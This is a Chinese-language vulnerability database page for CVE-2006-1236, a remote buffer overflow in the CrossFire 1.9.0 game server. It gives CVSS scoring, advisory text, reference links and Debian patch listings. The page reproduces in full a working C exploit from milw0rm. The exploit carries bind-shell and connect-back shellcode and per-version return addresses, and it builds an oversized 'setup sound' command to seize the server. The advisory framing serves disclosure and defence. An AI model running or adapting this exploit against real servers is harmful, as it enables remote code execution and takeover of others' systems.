CVE-2006-1236
CVSS7.5
发布时间 :2006-03-14 19:02:00
修订时间 :2011-03-07 21:32:30
NMCOES    

[原文]Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.


[CNNVD]CrossFire ‘socket/request.c’缓冲区溢出漏洞(CNNVD-200603-261)

        在CrossFire 1.9.0的socket/request.c中的SetUp函数中存在缓冲区溢出,远程攻击者可通过一个设置声音的长命令执行任意代码,这与CVE-2006-1010漏洞有所不同。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1236
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1236
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-261
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0951
(UNKNOWN)  VUPEN  ADV-2006-0951
http://www.securityfocus.com/bid/17093
(UNKNOWN)  BID  17093
http://www.milw0rm.com/exploits/1582
(UNKNOWN)  MILW0RM  1582
http://secunia.com/advisories/19237
(VENDOR_ADVISORY)  SECUNIA  19237
http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log
(UNKNOWN)  CONFIRM  http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log
http://xforce.iss.net/xforce/xfdb/25252
(UNKNOWN)  XF  crossfire-setup-bo(25252)
http://www.osvdb.org/23904
(UNKNOWN)  OSVDB  23904
http://www.debian.org/security/2006/dsa-1009
(UNKNOWN)  DEBIAN  DSA-1009
http://secunia.com/advisories/19276
(UNKNOWN)  SECUNIA  19276

- 漏洞信息

CrossFire ‘socket/request.c’缓冲区溢出漏洞
高危 缓冲区溢出
2006-03-14 00:00:00 2006-03-17 00:00:00
远程  
        在CrossFire 1.9.0的socket/request.c中的SetUp函数中存在缓冲区溢出,远程攻击者可通过一个设置声音的长命令执行任意代码,这与CVE-2006-1010漏洞有所不同。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Crossfire Crossfire 1.1
        Debian crossfire-doc_1.1.0-1woody2_all.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-doc _1.1.0-1woody2_all.deb
        Debian crossfire-edit_1.1.0-1woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_alpha.deb
        Debian crossfire-edit_1.1.0-1woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_arm.deb
        Debian crossfire-edit_1.1.0-1woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_hppa.deb
        Debian crossfire-edit_1.1.0-1woody2_i386.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_i386.deb
        Debian crossfire-edit_1.1.0-1woody2_ia64.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_ia64.deb
        Debian crossfire-edit_1.1.0-1woody2_m68k.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_m68k.deb
        Debian crossfire-edit_1.1.0-1woody2_mips.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_mips.deb
        Debian crossfire-edit_1.1.0-1woody2_mipsel.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_mipsel.deb
        Debian crossfire-edit_1.1.0-1woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_powerpc.deb
        Debian crossfire-edit_1.1.0-1woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_s390.deb
        Debian crossfire-edit_1.1.0-1woody2_sparc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edi t_1.1.0-1woody2_sparc.deb
        Debian crossfire-server_1.1.0-1woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_alpha.deb
        Debian crossfire-server_1.1.0-1woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_arm.deb
        Debian crossfire-server_1.1.0-1woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_hppa.deb
        Debian crossfire-server_1.1.0-1woody2_i386.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_i386.deb
        Debian crossfire-server_1.1.0-1woody2_ia64.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_ia64.deb
        Debian crossfire-server_1.1.0-1woody2_m68k.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_m68k.deb
        Debian crossfire-server_1.1.0-1woody2_mips.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_mips.deb
        Debian crossfire-server_1.1.0-1woody2_mipsel.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_mipsel.deb
        Debian crossfire-server_1.1.0-1woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_powerpc.deb
        Debian crossfire-server_1.1.0-1woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-ser ver_1.1.0-1woody2_s390.deb
        Debian crossfire-server_1.1.0-1woody2_sparc.deb
        Debian GNU/Linux 3.0 alias woody
        htt

- 漏洞信息 (1582)

crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit (EDBID:1582)
linux remote
2006-03-13 Verified
13327 landser
N/A [点击下载]
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host

unsigned char sc_cb[] = // izik's
	"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
	"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
	"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
	"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
	"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";

unsigned char sc_bind[] = // izik's
	"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
	"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
	"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
	"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
	"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
	"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
	"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";

struct {
	const char *type;
	unsigned char *code;
} shellcodes[] = {
	{"bind",		sc_bind},
	{"connectback",		sc_cb},
};

struct {
	const char *ver;
	unsigned long ret; // a "jmp *%eax" instruction
	unsigned short int len;
} targets[] = {
	{"crossfire-server_1.6.0.dfsg.1-4_i386.deb",	0x080d6f48, 0x1028},
	{"crossfire-server_1.8.0-2_i386.deb",		0x080506d7, 0x1130},
	{"crossfire-server_1.9.0-1_i386.deb",		0x0807aefa, 0x1130},
	{"crash",					0xcccccccc, 0x1300},
};

#define structsize(x) (sizeof x / sizeof x[0])

int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];

void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);

int main (int argc, char **argv) {
	int port = 0; // default value
	unsigned short int sc_port = 0;
	char *sc_host = NULL;

	printf("cf190.c by landser - ihsahn at gmail com\n\n");

	char c;
	while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
		switch (c) {
			case 's': sc = shellcodes[atoi(optarg)].code; break;
			case 'h': sc_host = strdup(optarg); break;
			case 'd': sc_port = atoi(optarg); break;
			case 't': n = atoi(optarg); break;
			case 'p': port = atoi(optarg); break;
			case '?': usage(argv[0]); return EXIT_FAILURE;
		}
	}

	if ((n < 0) || (n >= structsize(targets))) {
		printf("invalid target\n");
		usage(argv[0]);
		return EXIT_FAILURE;
	}
	
	if ((optind + 1) != argc) {
		printf("no hostname\n");
		usage(argv[0]);
		return EXIT_FAILURE;
	}

	establish(argv[optind], port ? port : PORT);
	
	update(sc, sc_port, sc_host);
       
	writebuf();

	printf("> sending\n");

	if (send(s, buf, targets[n].len + 2, 0) < 0) {
		perror("send()");
		return EXIT_FAILURE;
	}
	usleep(100000);

	printf("> done\n");
	
	close(s);

	return EXIT_SUCCESS;
}

void establish (char *ip, int port) {
	struct sockaddr_in sa;
	struct hostent *h;

	if (!(h = gethostbyname(ip))) {
		herror("gethostbyname()");
		exit(EXIT_FAILURE);
	}
	printf("> resolved %s to %s\n", ip,
			inet_ntoa(**((struct in_addr **)h->h_addr_list)));
	
	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	sa.sin_addr = **((struct in_addr **)h->h_addr_list);
	
	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket()");
		exit(EXIT_FAILURE);
	}

	if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
		perror("connect()");
		exit(EXIT_FAILURE);
	}

	printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}

void usage (char *argv0) {
	int i;
	
	printf("usage: %s -t <target> [-s <shellcode>] "
			"[-d <connectback/bind port] [-h <connectback ip>] "
			"host [-p <port>]\n", argv0);

	printf("- targets:\n");
	for (i=0;i<structsize(targets);i++)
		printf("%d. %s\n", i, targets[i].ver);

	printf("- shellcodes: (default 0)\n");
	for (i=0;i<structsize(shellcodes);i++)
		printf("%d. %s\n", i, shellcodes[i].type);
}

void update (unsigned char *code, int port, char *host) {
	if (!port) port = SC_PORT;
	
	if (!(port & 0xff) || !((port >> 8) & 0xff)) {
		printf("bad cb port\n");
		exit(EXIT_FAILURE);
	}
	*(unsigned short int *)(strstr(code, "PR")) = port;

	if (strstr(code, "HOST")) {
		in_addr_t inaddr;

		if (!host) host = SC_HOST;
		inaddr = inet_addr(host);
		
		if (inaddr == INADDR_NONE || strstr(host, "255")) {
			// ~(255) is 0
			printf("invalid cb hostname\n");
			exit(EXIT_FAILURE);
		}
		*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
	}
	
	if (host) free(host);
}
	
void writebuf (void) {
	unsigned char *ptr = buf;
	
	memset(buf, 0x90, sizeof buf);

	*ptr++ = (targets[n].len>> 8) & 0xff;
	*ptr++ = targets[n].len & 0xff;
	
	memcpy(ptr, "setup sound ", strlen("setup sound "));
	ptr += strlen("setup sound ");
	
	ptr += 120; // leave 120 nops before the shellcode
	memcpy(ptr, sc, strlen(sc));
	
	ptr = &buf[targets[n].len - 10];
	*(unsigned long *)ptr = targets[n].ret;
}

// milw0rm.com [2006-03-13]
		

- 漏洞信息

23904
CrossFire request.c SetUp() Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in CrossFire. CrossFire fails to properly handle boundary conditions within the SetUp() function in "request.c" when handling malicious content received in the "setup" command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-03-13 Unknow
2006-03-13 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Crossfire has released a patch to address this vulnerability. Upgrade the "request.c" file to at least version 1.86

- 相关参考

- 漏洞作者

- 漏洞信息

CrossFire SetUp Remote Buffer Overflow Vulnerability
Boundary Condition Error 17093
Yes No
2006-03-13 12:00:00 2006-12-13 04:23:00
Reported by landser <ihsahn at gmail com>.

- 受影响的程序版本

Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Crossfire Crossfire 1.9
Crossfire Crossfire 1.8
Crossfire Crossfire 1.6
Crossfire Crossfire 1.1

- 漏洞讨论

CrossFire is prone to a remote buffer-overflow vulnerability. This can facilitate a remote compromise due to arbitrary code execution.

CrossFire 1.9.0 and prior versions are vulnerable.

- 漏洞利用

Sample exploit code has been provided:

- 解决方案


Please see referenced vendor advisories for more information and fixes.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com


Crossfire Crossfire 1.1

Crossfire Crossfire 1.6

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站